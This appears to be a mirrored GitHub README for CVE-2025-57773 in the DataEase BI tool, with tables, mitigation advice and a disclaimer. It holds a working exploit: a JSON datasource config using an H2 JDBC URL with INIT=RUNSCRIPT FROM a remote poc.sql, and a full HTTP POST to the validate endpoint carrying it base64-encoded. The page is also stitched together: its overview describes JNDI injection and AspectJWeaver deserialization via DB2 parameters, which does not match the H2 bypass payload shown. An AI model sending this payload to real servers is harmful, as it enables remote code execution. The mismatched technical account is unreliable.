来源

关联漏洞

描述

Blackash-CVE-2025-57773

介绍

# 🛡 CVE-2025-57773 – Security Overview

CVE-2025-57773 is a **critical vulnerability** in **DataEase**, an open-source business intelligence and data visualization tool. It affects all versions **prior to 2.10.12**. The flaw allows attackers to exploit **JNDI injection**, leading to **deserialization attacks via AspectJWeaver**, resulting in **arbitrary file writes and potential remote code execution**. ⚠️💻

---

### 📌 General Information

| Field                  | Details                                 |
| ---------------------- | --------------------------------------- |
| 🆔 CVE ID              | CVE-2025-57773                          |
| ⚠️ Severity            | Critical                                |
| 🖥 Affected Software   | DataEase (BI & data visualization tool) |
| 📦 Vulnerable Versions | Prior to 2.10.12                        |
| 🛠 Type                | JNDI Injection / Deserialization / RCE  |

---

### 🛠 Technical Details

The vulnerability occurs due to **insufficient filtering of DB2 parameters**, which enables attackers to send malicious JNDI payloads.

| Step | Action                                                                       |
| ---- | ---------------------------------------------------------------------------- |
| 1️⃣  | Attacker injects JNDI payload via unfiltered DB2 parameters                  |
| 2️⃣  | AspectJWeaver component deserializes the payload                             |
| 3️⃣  | Requires `commons-collections` 4.x and `aspectjweaver-1.9.22.jar`            |
| 4️⃣  | Arbitrary file writes occur, potentially leading to remote code execution 💀 |

---

### ⚡ Impact

| Impact Type              | Description                             |
| ------------------------ | --------------------------------------- |
| 📝 File Manipulation     | Arbitrary file writes                   |
| 💻 Remote Code Execution | Possible through deserialization attack |

---

### 🛡 Mitigation

| Mitigation Step                 | Recommendation                                             |
| ------------------------------- | ---------------------------------------------------------- |
| ⬆️ Upgrade Software             | Update DataEase to version 2.10.12 or later                |
| 🧹 Input Validation / Filtering | Properly sanitize DB2 parameters to prevent JNDI injection |

---

Here, if the URL meets the criteria, the return value is the corresponding getJdbcUrl method. This is actually the getter method for the JdbcUrl parameter, which corresponds to the value of the JdbcUrl parameter we passed in. This method does not use H2's filtering logic, naturally bypassing the previous patch and returning our H2 JDBC URL. Finally, we pass "driver":"org.h2.Driver" to specify the selected driver. Then, getDriver will also retrieve the corresponding H2 driver, implementing the JDBC connection according to H2's logic.
The current payload is as follows. You can see that the payload here directly includes the filtered keywords INIT and RUNSCRIPT, but it still passes the verification:

```json
{
    "dataBase": "",
    "driver": "org.h2.Driver",
    "jdbcUrl": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:50025/poc.sql'",
    "urlType": "jdbcUrl",
    "sshType": "password",
    "extraParams": "",
    "username": "",
    "password": "",
    "host": "",
    "authMethod": "",
    "port": 0,
    "initialPoolSize": 5,
    "minPoolSize": 5,
    "maxPoolSize": 5,
    "queryTimeout": 30,
    "connectionType": "sid"
}
```

```
POST /de2api/datasource/validate HTTP/1.1
Host: 127.0.0.1:8100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101
Firefox/139.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 556
Origin: http://127.0.0.1:8100
Connection: close
Referer: http://127.0.0.1:8100/
Cookie: language=zh_CN; sessionId=29bd8318-3776-46a2-8a7e-d604dc4cdd33
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
{"id":"","name":"a","description":"","type":"oracle","configuration":"eyJkYXRhQmF
zZSI6IiIsImRyaXZlciI6Im9yZy5oMi5Ecml2ZXIiLCJqZGJjVXJsIjoiamRiYzpoMjptZW06dGVzdGRi
O1RSQUNFX0xFVkVMX1NZU1RFTV9PVVQ9MztJTklUPVJVTlNDUklQVCBGUk9NICdodHRwOi8vMTI3LjAuM
C4xOjUwMDI1L3BvYy5zcWwnIiwidXJsVHlwZSI6ImpkYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLC
JleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiIiwicGFzc3dvcmQiOiIiLCJob3N0IjoiIiwiYXV0aE1
ldGhvZCI6IiIsInBvcnQiOjAsImluaXRpYWxQb29sU2l6ZSI6NSwibWluUG9vbFNpemUiOjUsIm1heFBv
b2xTaXplIjo1LCJxdWVyeVRpbWVvdXQiOjMwLCJjb25uZWN0aW9uVHlwZSI6InNpZCJ9"}
```
![CVE-2025-57773](https://github.com/user-attachments/assets/f4cab3f5-f493-480c-8116-e0365dcaa291)

---

Here’s a clear and actionable set of advice for **CVE-2025-57773**:

---

### 🔹 Immediate Actions

1. **Upgrade DataEase** ⬆️

   * Install version **2.10.12 or later** immediately. This is the only way to fully patch the vulnerability.

2. **Sanitize DB2 Parameters** 🧹

   * Ensure all database inputs are properly filtered and validated to prevent JNDI injection.

3. **Audit Dependencies** 📦

   * Confirm that `commons-collections` 4.x and `aspectjweaver-1.9.22.jar` are updated or replaced with safe versions if used elsewhere.

4. **Monitor Logs** 🔍

   * Check for unusual activity, especially deserialization attempts or file write anomalies.

5. **Limit Exposure** 🔒

   * Restrict external access to DataEase servers until the patch is applied.

---

### 🔹 Long-Term Recommendations

* **Regular Updates** 🔄 – Keep DataEase and all related libraries up to date.
* **Security Scanning** 🛡 – Run vulnerability scanners periodically to detect risky components.
* **Incident Response Plan** 📋 – Prepare procedures for quickly responding to potential exploits.
* **User Awareness** 👥 – Train admins and developers about injection attacks and safe coding practices.


---

### ⚠️ Disclaimer

The information provided about **CVE-2025-57773** is for **educational, awareness, and defensive purposes only**. It is intended to help administrators, developers, and security professionals **understand the vulnerability and protect their systems**.

**Do not use this information to exploit systems or conduct unauthorized activities.** Unauthorized access or attacks on systems without permission are **illegal and punishable by law**.

Always apply security updates, follow best practices, and operate within legal and ethical boundaries when handling vulnerabilities.

---

文件快照

 [4.0K]  /data/pocs/e8bde6b55def5508a363d7d5621c30608ba41681
└── [6.5K]  README.md

0 directories, 1 file

备注